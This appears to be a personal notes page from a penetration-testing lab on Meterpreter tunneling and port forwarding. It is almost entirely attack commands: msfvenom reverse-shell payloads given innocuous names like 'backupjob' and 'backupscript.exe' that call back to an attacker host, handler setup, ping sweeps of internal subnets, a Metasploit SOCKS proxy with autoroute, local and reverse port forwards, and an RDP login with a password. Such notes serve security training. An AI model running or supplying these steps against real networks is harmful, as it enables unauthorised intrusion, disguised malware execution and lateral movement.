d4rtht3ll3ctus' root vault

Meterpreter Tunneling & Port Forwarding

3 min read

Creating Payload for Ubuntu Pivot Host

 
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

Configuring & Starting the multi/handler

use exploit/multi/handler
set lhost 0.0.0.0
set lport 8080
set payload linux/x64/meterpreter/reverse_tcp
run

We can copy the backupjob binary file to the Ubuntu pivot host over SSH and execute it to gain a Meterpreter session.

Executing the Payload on the Pivot Host

./backupjob

Ping Sweep

run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

Ping Sweep For Loop on Linux Pivot Hosts

 
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

Ping Sweep For Loop Using CMD

 
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

Ping Sweep Using PowerShell

 
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

Note: It is possible that a ping sweep may not result in successful replies on the first attempt, especially when communicating across networks. This can be caused by the time it takes for a host to build it’s arp cache. In these cases, it is good to attempt our ping sweep at least twice to ensure the arp cache gets built.

Instead of using SSH for port forwarding, we can also use Metasploit’s post-exploitation routing module socks_proxy to configure a local proxy on our attack host. We will configure the SOCKS proxy for SOCKS version 4a

Configuring MSF’s SOCKS Proxy

use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a
run
options

Confirming Proxy Server is Running

jobs
Id  Name                           Payload  Payload opts
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

Adding a Line to proxychains.conf if Needed

socks4 	127.0.0.1 9050

Tell our socks_proxy module to route all the traffic via our Meterpreter session. We can use the post/multi/manage/autoroute module from Metasploit to add routes for the 172.16.5.0 subnet and then route all our proxychains traffic.

Creating Routes with AutoRoute

use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run

or

run autoroute -s 172.16.5.0/23

 -p option to list the active routes

Listing Active Routes with AutoRoute

run autoroute -p

Testing Proxy & Routing Functionality

proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

Port Forwarding

Portfwd options

help portfwd

Creating Local TCP Relay

portfwd add -l 3300 -p 3389 -r 172.16.5.19

Connecting to Windows Target through localhost

xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Netstat Output

netstat -antp

Meterpreter Reverse Port Forwarding

Reverse Port Forwarding Rules

portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

Configuring & Starting multi/handler

bg
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 8081 
set LHOST 0.0.0.0 
run

Generating the Windows Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

Establishing the Meterpreter session

shell

Graph View